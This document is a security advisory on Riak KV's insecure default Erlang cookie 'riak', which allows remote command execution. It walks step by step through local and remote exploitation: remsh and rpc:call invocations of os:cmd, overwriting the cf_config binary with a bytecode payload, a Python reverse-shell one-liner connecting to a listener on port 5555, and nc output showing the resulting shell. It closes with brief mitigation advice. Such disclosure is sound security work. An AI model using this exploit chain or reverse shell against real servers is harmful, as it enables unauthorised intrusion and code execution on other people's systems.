Riak Insecure Default Configuration / Remote Command Execution

Riak runs as an Erlang service configured with a default cookie of riak that allows for remote command execution if not modified before use.

MD5 | 15cc4108a20bbd107a3861961401ba62

Riak KV Insecure Default Cookie RCE


Riak is a NoSQL key-value database that is built to maximize data availability and performance, especially useful for eg. big data environments. It's built to survive data and network failures with design principles similar to DynamoDB while being released around the same time as Redis.

It runs as an Erlang service using typical cookie authentication for node communication. It was discovered during testing that the default cookie is 'riak' and if not changed to something secret before deployment, it's possible to execute arbtriary code on the running server. While this is not a bug, strictly speaking, but a high risk default insecure configuration that is both locally and remotely exploitable.


Local Exploitation

Check if riak is running on the local server by using the Erlang Port Mapper Daemon

$ epmd -names
epmd: up and running on port 4369 with data:
name riak at port 43451

We can see the cookie value is set to 'riak' -- this is a shared secret between nodes/clients and can be set on the CLI or ~/.erlang.cookie.

$ ps -aux | grep cookie
/opt/riak/rel/riak/bin/riak -scl false -sfwi 500 -P 256000 -e 256000 -Q 262144 -A 64 -K true -W w -Bi -zdbbl 32768
... -config ./releases/3.0/sys.config -setcookie riak

For local exploitation, we can pass the cookie value to the Erlang client, connect to the node and call functions such as os:cmd() with the very powerful remsh (Erlang remote shell /w REPL) interface.

$ erl -name test@localhost -setcookie riak -remsh [email protected]
([email protected])1> os:cmd("id;pwd").
"uid=1000(user) gid=1000(user) groups=1000(user)\n/opt/riak/rel/riak\n"

Looks like the riak server is running under the 'user' system account.

Here are some great references to dive into this area further

- https://broot.ca/erlang-remsh-is-dangerous.html
- https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/

Remote Exploitation

Remsh wasn't working remotely even after configuring the node name and updating /etc/hosts on the remote host

$ erl -name [email protected] -setcookie riak -remsh [email protected]
([email protected])1> os:cmd("id;pwd").
*** ERROR: Shell process terminated! (^G to start new job) ***

Instead of trying to use the erl client directly, another riak node was setup with the same default cookie to talk node-to-node instead of client-to-node, using the riak client and RPC calls

$ riak eval "rpc:call('[email protected]', os, cmd, [id])."
"uid=1000(user) gid=1000(user) groups=1000(user)\n"

This works for execution of a single command, but not for more than one

$ riak eval "rpc:call('[email protected]', os, cmd, [“id;pwd”])."
escript: exception error: no match of right hand side value

So we can only run one command with no args, no paths and that executable must be in $PATH -- how can we get a reverse shell with only a single command?

It helped a lot to take a look at https://erlang.org/doc/man/os.html and see what functions were available to call

> "rpc:call('[email protected]', file, read_file, ["test"])."

> "rpc:call('[email protected]', file, list_dir, ["log"])."

> "rpc:call('[email protected]', file, write_file, ["test123", []])."

> "rpc:call('[email protected]', file, set_cwd, ["etc"])."

> "rpc:call('[email protected]', os, cmd, ["ls"])."

So this is possible by using the Riak environment itself and described further in the full exploit chain.

Exploit Chain

1. Find a useful path that we can pivot up into

> rpc:call('[email protected]', os, cmd, ["env"]).


Check our current path

> rpc:call('[email protected]', os, cmd, ["pwd"]).

2. Change into the bin folder which is in our $PATH

> rpc:call('[email protected]', file, set_cwd, ["bin"]).

3. Find an executable in bin that "we won’t miss"

> rpc:call('[email protected]', os, cmd, ["ls"]).

4. Craft our payload and overwrite the executable file

(perhaps also call copy on the executable beforehand to save the original)

Ouch, simply passing “id” to file:write_file results in {error,badarg}.

Apparently need to generate and pass actual Erlang bytecode...

> rpc:call('[email protected]', file, write_file, ["cf_config", [105,100]]).

So after looking at https://elixirforum.com/t/how-to-get-the-binary-representation-of-a-module/18006/2, sounds like 105=i and 100=d... ok.

We can verify this with read_file

> rpc:call('[email protected]', file, read_file, ["cf_config"]).

Modify the options on a standard payloads-all-the-things reverse shell, pass it to the estr2bc helper app and use this generated payload in the call to file:write_file

$ estr2bc.py "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",
5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'"


5. Start our listener for the shell and execute the payload

> rpc:call('[email protected]', os, cmd, ["cf_config"]).

$ nc -l -p 5555
user@ubuntu:~/opt/riak/rel/riak/bin$ id
uid=1000(user) gid=1000(user) groups=1000(user)

This is RCE as the running user on a Riak server configured with the default cookie.

In summary...

- Execute env for check our current path
- Call set_cwd to bin to adjust path
- Select the cf_config executable in bin to overwrite
- Generate bytecode payload and replace cf_config
- Run the new cf_config


Change the default cookie to something of sufficiently length and random, similar to the way RabbitMQ does it.

(see distributed_cookie in riak.conf)

Maybe it's also possible to whitelist nodes with net_kernel.allow()? There seems to be some discussion around that on https://stackoverflow.com/questions/34868476/elixir-distributed-security-and-whitelisting-allowed-nodes.

Related Posts